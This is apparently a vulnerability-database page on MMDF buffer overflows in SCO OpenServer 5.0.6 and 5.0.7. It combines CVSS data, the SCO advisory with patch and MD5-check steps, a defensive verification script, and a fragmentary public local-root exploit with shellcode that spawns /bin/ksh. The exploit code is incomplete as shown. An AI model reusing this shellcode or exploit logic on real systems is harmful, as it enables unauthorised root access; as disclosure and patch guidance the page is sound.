Published: 2004-12-23 00:00:00
Revised: 2016-10-17 22:45:49

[Original] Multiple buffer overflows in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow attackers to execute arbitrary code, as demonstrated via the execmail program.

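[CNNVD] OpenServer MMDF multiple buffer overflow vulnerabilities (CNNVD-200412-101)

        In addition, MMDF has NULL pointer dereference and core dump issues, which can cause the application to crash,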

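- CVSS (Base Score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete shutdown of the system]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]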

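- CPE (Affected Platforms and Products)


- OVAL (Technical Details for Detection)


- Official Database Links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other Links and Resources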
(UNKNOWN)  BUGTRAQ  20041027 MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
(VENDOR_ADVISORY)  XF  openserver-mmdf-bo(16738)

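- Vulnerability Information

OpenServer MMDF multiple buffer overflow vulnerabilities
High risk  Boundary condition error
2004-12-23 00:00:00 2005-10-20 00:00:00
        In addition, MMDF has NULL pointer dereference and core dump issues, which can cause the application to crash,

- Advisories and Patches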

        OpenServer 5.0.7
         4.1 Location of Fixed Binaries
         SCO OpenServer Release 5.0.7 Maintenance Pack 3 and later also include this patch:

        OpenServer 5.0.6
         5.1 Location of Fixed Binaries

- Vulnerability Information (602)

SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit (EDBID:602)
sco local
2004-10-26 Verified
0 Ramon Valle
N/A
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];


// [2004-10-26]

- Vulnerability Information (F34740)

osx86_mmdfdeliver.c (PacketStormID:F34740)
2004-10-26 00:00:00
Ramon de C Valle  

MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86.

- Vulnerability Information (F33830)

SCOSA-2004.7.txt (PacketStormID:F33830)
2004-07-20 00:00:00

SCO Security Advisory - Multiple vulnerabilities have been found in the MMDF binaries included with SCO Openserver versions 5.0.6 and 5.0.7. These include buffer overflows, null dereferences, and core dumps.


			SCO Security Advisory

Subject:		OpenServer 5.0.6 OpenServer 5.0.7 : MMDF Various buffer overflows and other security issues
Advisory number: 	SCOSA-2004.7
Issue date: 		2004 July 14
Cross reference: 	sr884728 fz528322 erg712434 CAN-2004-0510 CAN-2004-0511 CAN-2004-0512

1. Problem Description

	Deprotect discovered a buffer overflow in execmail.  After reviewing 
	our code we determined the whole MMDF package needed a security audit.

	Various buffer overflows and other security issues that affect all 
	MMDF binaries have been corrected. 

	All but one of the MMDF binaries that were setuid root are no 
	longer setuid. 

	Additional changes in this version of MMDF are documented at
	and in the updated man pages which are included in SCOSA-2004.7

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF buffer overflows the name CAN-2004-0510.

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF null dereferences the name CAN-2004-0511.

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF core dumps the name CAN-2004-0512.

2. Vulnerable Supported Versions

	System			Binaries
	OpenServer 5.0.6 	MMDF Distribution
	OpenServer 5.0.7 	MMDF Distribution

3. Solution

	The proper solution is to install the latest packages.

4. OpenServer 5.0.7

	4.1 Location of Fixed Binaries

	The fixes are also available in SCO OpenServer Release 5.0.7 
	Maintenance Pack 3 or later.  See

5. OpenServer 5.0.6   

	5.1 Location of Fixed Binaries

	5.2 Verification

	MD5 (VOL.000.000) = 7d079342022ff408e479184fab3ee86b

	md5 is available for download from

	5.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the download directory as the location of
	the images.

6. References

	Specific references for this advisory:

	SCO security resources:

	SCO security advisories via email

	This security fix closes SCO incidents sr884728 fz528322

7. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO

8. Acknowledgments

	SCO would like to thank Deprotect which describes itself 
	as "a Swedish based security company divided into four 
	divisions; Managed Security Services, Security Services, 
	Products and Development and our Security Academy."
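
The image verification in section 5.2 and the setuid reduction described in section 1 can both be checked with a short script. This is an added example, not part of SCOSA-2004.7 or of the original page: the function names and directory arguments are assumptions, and only the file name VOL.000.000 and its MD5 value come from the advisory.

```shell
#!/bin/sh
# Added example: pre-install and post-install checks for SCOSA-2004.7.
# Directory arguments are placeholders; the advisory text on this page
# does not give the download or MMDF install paths.

# MD5 the advisory publishes for the OpenServer 5.0.6 image VOL.000.000.
ADVISORY_MD5="7d079342022ff408e479184fab3ee86b"

# Print the lowercase hex MD5 of a file using whichever tool is present.
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | awk '{print $1}'
    elif command -v openssl >/dev/null 2>&1; then
        openssl md5 "$1" | awk '{print $NF}'
    else
        md5 "$1" | awk '{print $NF}'      # "MD5 (file) = hash" style output
    fi
}

# Succeed only if FILE exists and its MD5 equals EXPECTED
# (default: the advisory value). Returns 2 if missing, 1 on mismatch.
verify_image() {
    file=$1 expected=${2:-$ADVISORY_MD5}
    [ -f "$file" ] || { echo "missing: $file" >&2; return 2; }
    actual=$(file_md5 "$file")
    [ "$actual" = "$expected" ] && return 0
    echo "MD5 mismatch for $file: got $actual" >&2
    return 1
}

# List regular files under DIR that are setuid and owned by OWNER
# (default root). After the fix, the advisory says all but one MMDF
# binary that was setuid root has lost the setuid bit.
setuid_files() {
    find "$1" -type f -user "${2:-root}" -perm -4000 -print | sort
}

# Succeed if at most MAX (default 1) setuid files remain under DIR.
check_setuid_budget() {
    count=$(setuid_files "$1" "${3:-root}" | wc -l | tr -d ' ')
    [ "$count" -le "${2:-1}" ]
}
```

Run `verify_image` on the downloaded image before starting `custom`, and `check_setuid_budget` on the MMDF directory afterwards; a failure of either means the system does not match what the advisory describes.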




- Vulnerability Information

SCO OpenServer MMDF execmail Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

A remote overflow exists in OpenServer. The execmail program fails to validate user input resulting in a buffer overflow. With a specially crafted request, an attacker can cause privilege escalation to root resulting in a loss of integrity.

- Timeline

2004-02-06 Unknown
2004-10-27 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- Related References

- Vulnerability Author

- Vulnerability Information

SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities
Boundary Condition Error 10758
Yes Yes
2004-07-20 12:00:00 2009-07-12 06:16:00
Discovery of the buffer overflow vulnerabilities is credited to the analysts at Deprotect. The individuals responsible for the discovery of the other issues are currently unknown; they were disclosed in the referenced vendor advisory.

- Affected Program Versions

+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6

- Vulnerability Discussion

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.

- Exploit

The following exploit is made available by Ramon de Carvalho Valle:

- Solution

SCO has released advisory SCOSA-2004.7 along with fixes dealing with this issue.


- Related References